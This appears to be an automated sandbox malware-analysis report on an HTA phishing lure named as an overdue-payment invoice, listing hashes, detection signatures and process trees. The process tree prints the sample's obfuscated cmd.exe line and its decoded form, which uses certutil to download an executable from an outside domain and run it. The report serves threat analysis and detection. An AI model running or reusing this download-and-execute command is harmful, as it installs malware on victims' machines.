Analysis
-
max time kernel
117s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20230831-en -
resource tags
arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system -
submitted
25-09-2023 10:02
Static task
static1
Behavioral task
behavioral1
Sample
mkhg_Overdue_payment.hta
Resource
win7-20230831-en
windows7-x64
4 signatures
150 seconds
Behavioral task
behavioral2
Sample
mkhg_Overdue_payment.hta
Resource
win10v2004-20230915-en
windows10-2004-x64
19 signatures
150 seconds
General
-
Target
mkhg_Overdue_payment.hta
-
Size
9KB
-
MD5
b9dfe024b3df498c61441d3f2f1bb498
-
SHA1
1d12bec3e863aa225f7be5008598dd953e23dc05
-
SHA256
3996b5a66262b9cf59b38a399d0467dae23a4044ddf26da24aa292659f3c0803
-
SHA512
833887996411ab1614f9cb750ad8516eaf223c8af8db0919f75a3d05a8460c5a925fa62193f8c447cbcc5073252300d3d9dd2c56a295f9a198433f566a398a65
-
SSDEEP
24:vVPaQJWpXy7RZnHDACVYxdNAbaCs58ms1e5XTldVbZiNMG:TJCy7R1ydNAbaHXtZG
Score
5/10
Malware Config
Signatures
-
An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
Processes:
cmd.exepid process 2432 cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Processes:
mshta.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious use of WriteProcessMemory 16 IoCs
Processes:
mshta.execmd.execmd.exedescription pid process target process PID 2420 wrote to memory of 2432 2420 mshta.exe cmd.exe PID 2420 wrote to memory of 2432 2420 mshta.exe cmd.exe PID 2420 wrote to memory of 2432 2420 mshta.exe cmd.exe PID 2420 wrote to memory of 2432 2420 mshta.exe cmd.exe PID 2432 wrote to memory of 744 2432 cmd.exe cmd.exe PID 2432 wrote to memory of 744 2432 cmd.exe cmd.exe PID 2432 wrote to memory of 744 2432 cmd.exe cmd.exe PID 2432 wrote to memory of 744 2432 cmd.exe cmd.exe PID 2432 wrote to memory of 2996 2432 cmd.exe cmd.exe PID 2432 wrote to memory of 2996 2432 cmd.exe cmd.exe PID 2432 wrote to memory of 2996 2432 cmd.exe cmd.exe PID 2432 wrote to memory of 2996 2432 cmd.exe cmd.exe PID 744 wrote to memory of 1876 744 cmd.exe certutil.exe PID 744 wrote to memory of 1876 744 cmd.exe certutil.exe PID 744 wrote to memory of 1876 744 cmd.exe certutil.exe PID 744 wrote to memory of 1876 744 cmd.exe certutil.exe
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\mkhg_Overdue_payment.hta"1⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2420 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/c Cmd /C ^s^T^a^R^t^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^/^b^ ^ ^ ^/^m^I^n^ ^ ^ ^c^e^R^T^U^T^I^L^.^e^x^E^ ^ ^ ^ ^-^U^r^L^c^a^c^H^e^ ^ ^ ^ ^ ^ ^-^S^P^L^i^t^ ^ ^ ^ ^ ^-^F^ ^ ^ ^ ^ ^ ^ ^h^t^t^p^s^:^/^/^v^o^i^l^a^r^a^p^e^.^o^n^l^i^n^e^/^i^n^v^o^i^c^e^/^d^o^c^d^a^d^2^0^2^3^0^9^2^5^.^e^x^e^ ^ C:\Users\Admin\AppData\Roaming\TestPutty.exe | CMd.exE /sTarT /b /MiN pInG.Exe & start C:\Users\Admin\AppData\Roaming\TestPutty.exe"2⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
PID:2432 -
C:\Windows\SysWOW64\cmd.exeCmd /C sTaRt /b /mIn ceRTUTIL.exE -UrLcacHe -SPLit -F https://voilarape.online/invoice/docdad20230925.exe C:\Users\Admin\AppData\Roaming\TestPutty.exe3⤵
- Suspicious use of WriteProcessMemory
PID:744 -
C:\Windows\SysWOW64\certutil.execeRTUTIL.exE -UrLcacHe -SPLit -F https://voilarape.online/invoice/docdad20230925.exe C:\Users\Admin\AppData\Roaming\TestPutty.exe4⤵PID:1876
-
C:\Windows\SysWOW64\cmd.exeCMd.exE /sTarT /b /MiN pInG.Exe3⤵PID:2996